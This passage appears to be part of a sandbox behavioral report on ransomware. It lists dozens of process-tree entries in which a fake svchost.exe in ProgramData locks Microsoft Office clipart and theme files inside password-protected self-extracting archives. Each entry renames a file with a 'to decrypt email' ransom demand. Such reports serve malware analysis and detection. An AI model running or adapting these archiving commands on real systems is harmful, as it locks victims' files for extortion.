  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02750U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02750U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2076
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02752U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02752U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:680
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02753U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02753U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2280
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02754U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02754U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:892
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02755U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02755U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2264
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02756U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02756U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1772
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02757U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02757U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2312
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02758U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02758U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2368
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02759J.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02759J.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2228
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02810J.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02810J.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3004
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02829J.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02829J.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:276
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02897J.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02897J.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2856
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03011U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03011U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2896
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03012U.BMP(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03012U.BMP" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2600
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03041I.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03041I.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2320
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03143I.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03143I.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2160
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1240
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03224I.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03224I.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2748
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03379I.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03379I.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2024
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03380I.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03380I.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1880
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1824
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Adjacency.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Adjacency.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2396
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Angles.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Angles.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2736
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Apex.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Apex.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1624
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Apothecary.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Apothecary.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1636
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Aspect.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Aspect.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1176
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Austin.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Austin.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1420
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Black Tie.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Black Tie.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:812
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Civic.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Civic.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:292
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Clarity.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Clarity.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:856
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Composite.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Composite.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1000
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Concourse.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Concourse.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2672
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Couture.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Couture.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1260
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Elemental.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Elemental.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:336
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Equity.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Equity.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2884
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Essential.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Essential.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1400
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Executive.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Executive.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2348
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Flow.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Flow.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2756
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Foundry.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Foundry.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1672
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grayscale.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grayscale.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:936
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grid.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grid.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:736
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Hardcover.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Hardcover.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2076
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Horizon.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Horizon.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:680
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Median.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Median.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2280
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Metro.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Metro.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:892
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Module.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Module.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:896
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Newsprint.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Newsprint.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:872
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Opulent.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Opulent.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2820
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Oriel.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Oriel.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2476
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Origin.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Origin.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1996
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Paper.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Paper.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2908
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Perspective.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Perspective.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:3012
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Pushpin.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Pushpin.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2972
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Slipstream.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Slipstream.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1704
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Solstice.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Solstice.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2772
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Technic.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Technic.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1948
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Thatch.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Thatch.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2824
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Trek.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Trek.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1836
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Urban.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Urban.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2692
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Verve.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Verve.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1924
- C:\ProgramData\msvkp\svchost.exe
